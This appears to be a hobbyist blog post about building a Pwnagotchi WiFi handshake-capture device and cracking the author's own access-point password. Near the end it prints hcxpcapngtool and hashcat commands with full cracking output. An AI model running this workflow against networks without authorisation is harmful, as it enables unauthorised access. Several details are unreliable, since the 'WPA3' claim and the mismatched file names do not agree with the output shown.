Pwnagotchi – AI-powered WiFi hacking!

It’s not known by many, but this powerful toolchain showcases the forward momentum AI has in store for the future of cybersecurity. I discovered this tool through a random video on YouTube Shorts and with a quick 10-second video of “Look at this hacking tool that PWNZ wireless networks,” I had to dive in. Over the next hour or so, I had to use Google to find more information, as there were zero links in the video I watched. Quickly, I noticed there seemed to be a split in an unknown community as there were various images and instructional guides, including many!

‍

Let's AI

After reading the information on the “official” webpage, you can browse it at https://pwnagotchi.ai/, which appears to be an official page. Do note, you visit at your own risk. Within the documentation, a nugget discusses the neural network, which allows the particular AI to “eat handshakes.” The AI utilized within the pwnagotchi claims to be a Reinforced Learning styled AI, whereas it learns by failing in a very repetitive fashion, much like me when I’m coding hobby projects. Amazon provides some useful reading about Reinforced Learning. Reading is what I did so I could better understand the various states the claimed AI was taking to “eat handshakes.”

‍

The process was relatively straightforward, and I found various fixes since I decided to order the latest version of hardware components and not follow the “recommended hardware” section. Who has time to read recommendations these days? So, the following pain was because I deviated, and v1.5.5, as listed, didn’t work out of the box. I had to find other resources by searching GitHub for other forked repositories that had made promises to get the WaveShare v4.0 operational, the paperwhite display that drives the information to the end user meaningfully.

‍

After about an hour, I had everything configured and operational, including a tea break and some more YouTube video binging. The face greeted me on the screen with a message: “I’m mad at you.” Short of dunking it into my tea because how dare this AI speak to me this way? I laughed delightedly and decided to dive into the configuration and look under the hood. You can have a direct look by going directly to this portion of the website: https://pwnagotchi.ai/usage/#training-the-ai.

‍

Outcome

My wireless AP only took less than 10 seconds to show up as PWND! I connected via SSH to the PiZero and extracted the pcap file. I converted this to the required hc22000 format, which hashcat needs to perform the final step of cracking the hash. Because I don’t need to run a list of thousands of passwords to test, I put my AP password into a file called word.txt to illustrate how effective the handshake eating was from the Pwnagotchi! I’ve used many other tools, including the WiFi Pineapple from Hak5, but this tool ran for $80.56 and only took less than an hour to set up and begin using.

‍

FOR LEARNING PURPOSES ONLY

hcxpcapngtool -o AP.hc2200 AP.pcap

hashcat –force -m 22000 AP.hc2200 word.txt

Session..........: hashcat

Status...........: Cracked

Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)

Hash.Target......: SGC.hc2200

Time.Started.....: Wed Apr 24 16:15:45 2024, (0 secs)

Time.Estimated...: Wed Apr 24 16:15:45 2024, (0 secs)

Kernel.Feature...: Pure Kernel

Guess.Base.......: File (word.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.#1.........:      15 H/s (0.56ms) @ Accel:64 Loops:64 Thr:64 Vec:1

Recovered........: 2/2 (100.00%) Digests (total), 2/2(100.00%) Digests (new)

Progress.........: 1/1 (100.00%)

Rejected.........: 0/1 (0.00%)

Restore.Point....: 0/1 (0.00%)

Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1-3

Candidate.Engine.: Device Generator

Candidates.#1....: notmywifi -> notmywifi

Hardware.Mon.SMC.: Fan0: 99%, Fan1: 99%

Hardware.Mon.#1..: Util: 92%

Started: Wed Apr 24 16:15:44 2024

Stopped: Wed Apr 24 16:15:46 2024

‍

As you can see from the above output, the pwnagotchi successfully ate the handshakes required to capture enough data to determine what would be needed to obtain the passphrase to the WPA3-secured wireless network.

‍

Future

Within this adventure, the possibilities are endless for crafting precise tools to perform attacks and do it well. While the primary focus is within the LLM Large Language Models, the threat actors aren’t just sitting idle or hacking prompts to divulge sensitive data. Still, they’re actively working on projects much like the pwnagotchi. As for now, the game of cat and mouse that we call cybersecurity rages on for the long-term foreseeable future.